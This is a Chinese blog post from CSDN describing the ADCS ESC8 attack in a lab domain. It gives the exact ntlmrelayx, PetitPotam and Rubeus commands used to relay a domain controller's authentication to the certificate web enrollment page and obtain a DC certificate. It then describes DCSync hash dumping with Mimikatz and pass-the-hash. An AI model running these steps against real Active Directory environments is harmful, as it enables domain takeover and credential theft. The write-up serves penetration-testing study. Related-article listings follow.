ADCS-ESC8漏洞利用

最新推荐文章于 2025-02-27 15:23:32 发布
最新推荐文章于 2025-02-27 15:23:32 发布
阅读量673 收藏 3
点赞数 20
文章标签: ADCS 域安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44001905/article/details/145871041
版权

原理

在默认配置下,Web 证书注册页面仅采用 HTTP 协议进行通信,同时支持使用 NTLM 身份验证机制来确认用户身份。然而,该页面并未启用任何针对 NTLM Relay 攻击的防护措施,攻击者可以通过中继受害者的认证请求,伪装成受害者向证书颁发机构(CA)请求证书,从而实现持久化的权限提升或域控接管。

漏洞利用条件

ADCS Web Enrollment 启用: 目标环境中存在启用了 Web 注册功能的证书颁发机构(CA),通常访问路径为 http://<CA服务器>/certsrv/。

NTLM 认证支持: Web 端点支持 NTLM 认证,且未强制启用 HTTPS 或扩展保护(Extended Protection for Authentication, EPA),这使得 NTLM 中继攻击成为可能。

证书模板可用: CA 上至少有一个已发布的证书模板允许客户端认证(Client Authentication)或域计算机注册(Domain Computer Enrollment),例如默认的 Machine 或 DomainController 模板。

漏洞环境验证

ADCS默认存在http://<CA服务器>/certsrv/

访问http://<CA服务器>/certsrv/certfnsh.asp页面

漏洞利用

环境介绍

域控:192.168.110.127

证书服务器:192.168.110.153

域内主机:192.168.110.222

域外kali:192.168.110.155

攻击过程

在域外kali上执行

使用impacket中的ntlmrelayx.py进行监听

python ntlmrelayx.py -t http://192.168.110.153/certsrv/certfnsh.asp --adcs --template DomainController

使用 PetitPotam 诱导DC向攻击者认证

python PetitPotam.py 192.168.110.155 192.168.110.127 -d lutra.com

ntlmrelayx.py捕获并中继认证到CA,请求DomainController模板的证书。

在域内主机上执行

获得证书后,使用Rubeus请求TGT

Rubeus.exe asktgt /user:D1C$ /certificate:dc.pfx /dc:192.168.110.127 /ptt

使用klist查看缓存的票据

使用Mimikatz执行DCSync获取域内所有用户的NTLM Hash

发起PTH攻击,发现域内普通账户没有权限

切换到当前域内主机本地管理员账户进行操作

PTH攻击后,已经有权限访问域控目录

Iam0x17
关注
ADCS攻击系列【ESC1-8】详解
总有人间一两风,填我十万八千梦
09-11 677
ADCS(Active Directory Certificate Services),是微软提供的一套证书服务解决方案,用于实现公钥基础结构(PKI)的功能,包括证书的产生、管理、存储、分发和撤销等。ADCS能够与现有的Active Directory Domain Services(ADDS)服务结合,用于加密文件系统、数字签名以及身份验证等多种安全应用场景。在ADCS中,证书颁发机构(CA)扮演着核心角色,负责接收证书申请、验证申请者信息、颁发证书以及管理证书的吊销等。
ADCS ESC1+ESC4+CVE-2022–26923
问题很多的小明
06-27 639
ADCS渗透相关
PetitPotam漏洞复现(ESC8)结合CVE-2019-1040
whojoe的博客
08-02 3761
PetitPotam漏洞复现环境搭建漏洞复现参考文章 环境搭建 主机 机器名 ip 用户 密码 版本 控1 ad.test.com 192.168.164.147 administrator Aa1234 win2012r2 控2 ad2.test.com 192.168.164.146 administrator Aa1234 win2012r2 内机器 user.test.com 192.168.164.129 user1 Uu1234. win2008r2 kali
ADCS攻击之NTLM Relay攻击 ESC8
Adminxe的博客
03-05 866
ADCS在默认安装的时候,其Web接口支持NTLM身份验证并且没有启用任何NTLM Relay保护措施。强制控制器计算机帐户(DC$)向配置了NTLM中继的主机进行身份验证。身份验证被转发给证书颁发机构(CA)并提出对证书的请求。获取到了DC$的证书后就可以为用户/机器请求TGS/TGT票据,获取相应的权限。curl-I。
终于有人把渗透之ADCS证书攻击讲透了
weixin_65550121的博客
12-09 2555
PKI是一个术语,有些地方会采用中文的表述——公钥基本结构,用来实现证书的产生、管理、存储、分发和撤销等功能。我们可以把他理解成是一套解决方案,这套解决方案里面需要有证书颁发机构,有证书发布,证书撤掉等功能。
安全|AD CS Relay—ESC8
weixin_42282189的博客
03-24 7676
作者: 0xYyy 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 国外安全研究人员在6月份已经披露过攻击手法—通过证书进行中继从而来达到攻击控的目的。 https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/ 0x02 AD CS作用 1、证书颁发机构(CA):可以向用户、机构和服务颁发证书。 2、CA WEB注册:用户可以通过web浏览器申请证书。 3、联机响应程序.
ADCS-ESC6漏洞环境构造与利用
信息安全
02-27 192
然而,按照微软描述,设置该标志后,攻击者能利用这一机制为任意用户注册证书。:攻击者必须拥有向 CA 提交证书请求的权限(通常为普通用户权限)。在企业内部基于 PKI 为 Web 服务器颁发证书的场景中,管理员为给证书添加额外主机名,会在 CA 上设置。该标志允许证书请求中自定义主题备用名称(SAN)字段,包括任意用户身份信息(如管理员)。将申请的证书复制保存为esc6.pem,使用openssl转为esc6.pfx,密码为空即可。使用Rubeus请求管administrator的TGT。
ADCS-ESC3漏洞环境构造与利用
信息安全
02-25 652
但当存在两个特定配置的证书模板时,低权限用户利用第一个模板(需有权限注册证书且应用策略开启“证书申请代理”等)申请包含证书请求代理EKU的证书,然后使用此证书,借助第二个模板(需有权限注册证书、定义启用认证的EKU等)代表高权限用户申请证书。若CA配置存在漏洞,未严格验证就颁发证书,攻击者就能获取高权限证书,进而通过获取TGT票据提升权限,访问内高权限资源。在证书颁发机构中的证书模板右键点击新建要颁发的证书模板,选择新复制的模板ESC2确定添加。选择应用程序策略,将策略设置为证书申请代理。
内网渗透(八十五)之ADCS证书服务攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-28 1303
2021年6月17日,国外安全研究员 Will Schroeder 和 Lee Christensen 共同发布了针对ADCS(Active Directory Certificate Service, 活动目录证书服务)的攻击手法。同年8月5日,在Black Hat 2021上 Will Schroeder 和 Lee CHristensen 对该攻击手法进行了详细讲解。至此,ADCS攻击第一次进入人们的视野。
红队专题-内网横向-工作组Workgroup与 Domain Active Directory渗透
aming小老弟
12-21 1895
通过使用活动目录,管理员能够中心化、批量地更新和管理操作系统、应用、用户以及对数据的访问,而用户和管理员也能很容易地获取这些信息。而且因为活动目录具备中心化的管理能力,攻击者一旦获得管理员权限,即可控制内所有用户和主机,因此活动目录环境也备受攻击者青睐。实际上LSA保护不能抵御这些攻击,它只会让你在执行这些攻击前,需要做一些额外的操作,让攻击变得更加困难一些。此功能基于PPL技术,它是一种纵深防御的安全功能,旨在“防止非管理员非PPL进程通过打开进程之类的函数串改PPL进程的代码和数据”。
红队|渗透重要漏洞总结
渗透测试研究中心
11-24 1491
1.MS14-068kerberos认证,no PAC用户在向 Kerberos 密钥分发中心(KDC)申请TGT(由票据授权服务产生的身份凭证)时,可以伪造自己的 Kerberos 票据漏洞效果:将任意用户提升到管权限利用条件:1.小于2012R2的控 没有打MS14-068的补丁(KB3011780)2.拿下一台加入的计算机3.有这台内计算机的用户密码和Sid利用方式:在《Ker...
Windows Server Active Directory 证书服务(AD CS)安装与部署指南
热门推荐
有技术的机械师
07-08 2万+
本篇文章重点介绍一下Windows Server Active Directory 证书服务安装与部署。 从以下几个方面入手介绍:
印刷体数字与字母图片数据集资源
06-12
资源下载链接为: https://pan.quark.cn/s/fc04644b4a11 本数据集包含印刷体数字和字母的黑白图像,涵盖数字0至9、大写字母A至Z以及小写字母a至z,共计62个类别。每个类别均包含1016张图像,所有图像统一为128×128像素的尺寸规格。图像按照类别分别存储在不同的文件夹中。该数据集可用于印刷体数字与字母识别模型的训练工作。
官方软件stm32cubemx-v6-0-0 以及 所需java环境软件jre-8u441
06-12
目前在stm官方网站直接下载安装最新版的STM32cubeMX软件,运行软件后新建工程或升级软件都会直接提示无法连接服务器(“Check Connection 失败”),原因是从6.0版本开始 STM32cubeMX 不在集成JAVA环境,必须卸载已经安装的STM32cubeMX软件,然后安装stm32cubemx_v6-0-0 以及 jre-8u441,如果希望使用最新版本,直接在STM32cubeMX中带点击更新升级就好。
c# OpenCV入门基础 腐蚀、膨胀、开运算、闭运算
06-12
c# OpenCV入门基础 腐蚀、膨胀、开运算、闭运算
Remo电池机原备份.bin
最新发布
06-12
当前所发布的全部内容源于互联网搬运整理收集,仅限于小范围内传播学习和文献参考,仅供日常使用,不得用于任何商业用途,请在下载后24小时内删除,因下载本资源造成的损失,全部由使用者本人承担!如果有侵权之处请第一时间联系我们删除。敬请谅解!
软件开发劳动合同范本.doc
06-12
软件开发劳动合同范本.doc
基于Spring Boot架构的社团综合管理系统
06-12
资源下载链接为: https://pan.quark.cn/s/72147cbc453d 在当今信息化时代,高校社团管理的高效性与便捷性至关重要。基于 Spring Boot 开发的社团管理系统,致力于打造一个功能全面、操作便捷且安全可靠的平台,以满足高校社团的日常运营需求。本文将深入剖析该系统的架构设计、核心功能以及实现原理。 Spring Boot 以其轻量级和快速开发的特性,成为众多企业级应用的首选框架。本社团管理系统采用 Spring Boot 搭建,并遵循 RESTful API 设计原则,构建出一个松耦合、模块化的架构。借助 Spring Boot 的自动配置功能,项目初始化工作得以大幅简化,使开发者能够更加专注于业务逻辑的开发。 权限管理是系统安全的关键环节。本系统引入多级权限控制机制,确保不同角色(如管理员、普通成员等)能够访问其对应的系统功能。通常会借助 Spring Security 或 Apache Shiro 等安全框架,通过角色、权限与资源的映射关系,实现对用户操作的精细化管理。 为了提升用户体验和提高信息传递效率,系统集成了短信接口。在用户注册、密码找回、活动报名等关键操作环节,通过短信验证码进行验证。这需要与第三方短信服务提供商(如阿里云、腾讯云等)进行对接,利用其 SDK 实现短信的发送与接收功能。 会员管理:涵盖会员注册、登录、信息修改及权限分配等功能,方便社团成员进行自我管理。 活动管理:支持活动的创建、审批、报名以及评价等全流程管理,便于社团组织各类活动。 场地管理:实现场地的预定、审批和使用记录管理,确保资源的有效分配。 会议管理:提供会议安排、通知以及签到等功能,提升会议组织效率。 社团管理:包括社团的创建、修改、解散以及社团成员管理等功能。 消息通知:能够实时推送系统消息,保障信息的及时传达。 文件下发:支持文件的上传与下载,方便
【Python实战(含源码)】:一键往Word文档的表格中填写数据.zip
06-12
Python实战案例(含远源码)
adcs
03-28
需要将这些信息整合起来,说明ADCS环境中的作用,以及攻击者可能利用漏洞,比如证书模板权限配置不当导致的权限提升。 然后,用户可能想知道ADCS的具体应用场景和为什么在安全研究中重要。需要结合引用中的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值